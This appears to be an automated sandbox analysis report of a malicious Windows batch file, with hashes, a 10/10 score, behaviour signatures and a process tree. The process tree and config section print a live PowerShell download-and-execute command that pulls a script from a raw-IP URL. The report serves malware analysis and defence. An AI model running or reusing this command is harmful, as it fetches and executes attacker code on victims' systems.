Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
04-06-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
bef69b68e4cea8e3eefee8da26543509.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
bef69b68e4cea8e3eefee8da26543509.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
bef69b68e4cea8e3eefee8da26543509.bat
-
Size
220B
-
MD5
f506edf0fe02fe851c4ad75db6112399
-
SHA1
583ba0b7f8553e3ea3adf90de4f1750e8d989390
-
SHA256
f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e
-
SHA512
db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2064 1812 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2064 WerFault.exe Token: SeBackupPrivilege 2064 WerFault.exe Token: SeDebugPrivilege 2064 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe 2064 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"1⤵PID:1504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"2⤵PID:1812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2064